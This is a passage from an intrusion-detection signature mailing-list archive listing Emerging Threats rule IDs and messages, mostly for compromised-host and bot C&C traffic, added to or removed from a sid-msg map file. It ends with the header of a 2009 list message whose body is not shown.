        2500587 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (294) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500588 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (295) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500589 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (295) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500590 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (296) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500591 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (296) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500592 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (297) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500593 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (297) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500594 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (298) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500595 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (298) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500596 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (299) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500597 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (299) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500598 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (300) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500599 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (300) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500600 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (301) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500601 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (301) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500602 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (302) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500603 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (302) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510544 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (273) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510545 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (273) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510546 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (274) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510547 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (274) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510548 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (275) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510549 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (275) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510550 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (276) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510551 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (276) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510552 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (277) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510553 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (277) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510554 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (278) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510555 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (278) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510556 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (279) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510557 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (279) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510558 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (280) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510559 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (280) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510560 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (281) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510561 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (281) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510562 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (282) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510563 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (282) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510564 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (283) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510565 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (283) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510566 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (284) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510567 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (284) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510568 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (285) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510569 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (285) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510570 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (286) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510571 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (286) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510572 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (287) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510573 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (287) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510574 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (288) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510575 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (288) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510576 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (289) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510577 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (289) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510578 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (290) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510579 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (290) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510580 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (291) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510581 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (291) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510582 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (292) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510583 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (292) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510584 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (293) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510585 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (293) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510586 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (294) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510587 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (294) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510588 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (295) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510589 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (295) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510590 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (296) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510591 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (296) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510592 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (297) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510593 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (297) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510594 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (298) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510595 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (298) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510596 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (299) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510597 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (299) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510598 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (300) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510599 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (300) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510600 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (301) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510601 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (301) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510602 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (302) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510603 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (302) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Removed from emerging-sid-msg.map.txt (123):
        2008357 || ET SCAN Amap Scannner Traffic Inbound || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Amap || url,doc.emergingthreats.net/2008357 || url,freeworld.thc.org/thc-amap/
        2404028 || ET DROP Known Bot C&C Server Traffic (group 29)  || url,www.shadowserver.org
        2405028 || ET DROP Known Bot C&C Traffic (group 29) - BLOCKING SOURCE || url,www.shadowserver.org
        2500544 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (273) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500545 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (273) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500546 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (274) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500547 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (274) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500548 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (275) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500549 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (275) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500550 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (276) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500551 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (276) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500552 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (277) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500553 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (277) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500554 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (278) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500555 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (278) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500556 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (279) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500557 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (279) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500558 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (280) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500559 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (280) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500560 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (281) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500561 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (281) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500562 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (282) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500563 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (282) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500564 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (283) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500565 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (283) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500566 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (284) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500567 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (284) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500568 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (285) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500569 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (285) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500570 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (286) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500571 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (286) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500572 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (287) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500573 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (287) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500574 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (288) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500575 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (288) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500576 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (289) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500577 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (289) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500578 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (290) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500579 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (290) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500580 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (291) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500581 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (291) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500582 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (292) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500583 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (292) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500584 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (293) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500585 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (293) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500586 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (294) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500587 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (294) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500588 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (295) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500589 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (295) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500590 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (296) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500591 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (296) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500592 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (297) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500593 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (297) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500594 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (298) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500595 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (298) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500596 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (299) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500597 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (299) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500598 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (300) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500599 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (300) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500600 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (301) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500601 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (301) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500602 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (302) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500603 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (302) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510544 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (273) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510545 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (273) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510546 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (274) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510547 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (274) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510548 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (275) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510549 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (275) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510550 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (276) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510551 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (276) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510552 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (277) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510553 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (277) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510554 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (278) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510555 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (278) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510556 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (279) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510557 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (279) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510558 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (280) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510559 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (280) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510560 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (281) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510561 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (281) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510562 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (282) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510563 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (282) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510564 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (283) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510565 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (283) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510566 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (284) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510567 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (284) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510568 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (285) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510569 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (285) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510570 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (286) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510571 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (286) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510572 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (287) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510573 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (287) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510574 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (288) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510575 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (288) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510576 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (289) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510577 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (289) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510578 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (290) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510579 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (290) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510580 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (291) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510581 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (291) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510582 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (292) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510583 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (292) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510584 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (293) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510585 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (293) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510586 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (294) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510587 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (294) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510588 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (295) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510589 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (295) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510590 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (296) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510591 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (296) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510592 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (297) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510593 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (297) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510594 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (298) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510595 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (298) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510596 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (299) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510597 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (299) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510598 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (300) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510599 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (300) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510600 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (301) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510601 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (301) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510602 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (302) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510603 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (302) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts


From mail at mare-system.de  Sun Dec  6 05:03:02 2009
From: mail at mare-system.de (mex)
Date: Sun, 06 Dec 2009 11:03:02 +0100
Subject: [Emerging-Sigs] alerting on responses (rfi-based)
